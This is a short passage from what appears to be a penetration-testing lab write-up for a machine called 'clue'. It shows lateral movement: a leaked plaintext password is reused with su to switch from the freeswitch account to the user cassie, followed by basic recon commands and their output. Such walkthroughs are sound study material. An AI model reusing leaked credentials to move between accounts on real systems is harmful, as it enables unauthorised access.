cassie


Trying again the leaked password; SecondBiteTheApple330

freeswitch@clue:/$ su cassie
Password: SecondBiteTheApple330
 
cassie@clue:/$ whoami
cassie
cassie@clue:/$ hostname
clue
cassie@clue:/$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 00:50:56:9e:c3:e4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.220.240/24 brd 192.168.220.255 scope global ens192
       valid_lft forever preferred_lft forever

It works. It didn’t work against the SSH server. Lateral Movement made to the cassie user